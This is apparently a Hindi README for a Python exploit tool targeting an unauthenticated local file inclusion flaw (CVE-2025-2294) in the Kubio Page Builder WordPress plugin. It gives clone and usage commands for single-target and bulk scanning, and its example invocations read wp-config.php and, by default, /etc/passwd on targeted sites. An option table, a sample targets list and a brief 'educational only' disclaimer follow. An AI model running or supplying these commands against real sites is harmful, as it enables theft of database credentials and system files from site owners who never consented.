
Kubio Page Builder WordPress प्लगइन (CVE-2025-2294) के लिए बिना प्रमाणीकरण के स्थानीय फ़ाइल समावेशन (LFI) एक्सप्लॉइट। एकल लक्ष्य, बल्क स्कैनिंग, संस्करण पहचान और कस्टम फ़ाइल पथ पढ़ने का समर्थन करता है।
Kubio Page Builder WordPress प्लगइन (संस्करण ≤ 2.5.1) के लिए Local File Inclusion (LFI) एक्सप्लॉइट।
यह टूल Kubio Page Builder प्लगइन (CVE-2025-2294) में एक बिना प्रमाणीकरण वाली LFI कमज़ोरी का फायदा उठाता है, जिससे हमलावर कमज़ोर WordPress इंस्टॉलेशन पर संवेदनशील फ़ाइलें पढ़ सकते हैं।
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
| विकल्प | विवरण |
|---|---|
-u, --url | एकल टार्गेट URL |
-l, --list | टार्गेट की सूची वाली फ़ाइल |
-f, --file | पढ़ने के लिए फ़ाइल (डिफ़ॉल्ट: /etc/passwd) |
-o, --output | कमज़ोर टार्गेट को फ़ाइल में सहेजें |
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
यह टूल केवल शैक्षिक उद्देश्यों के लिए है। डेवलपर किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।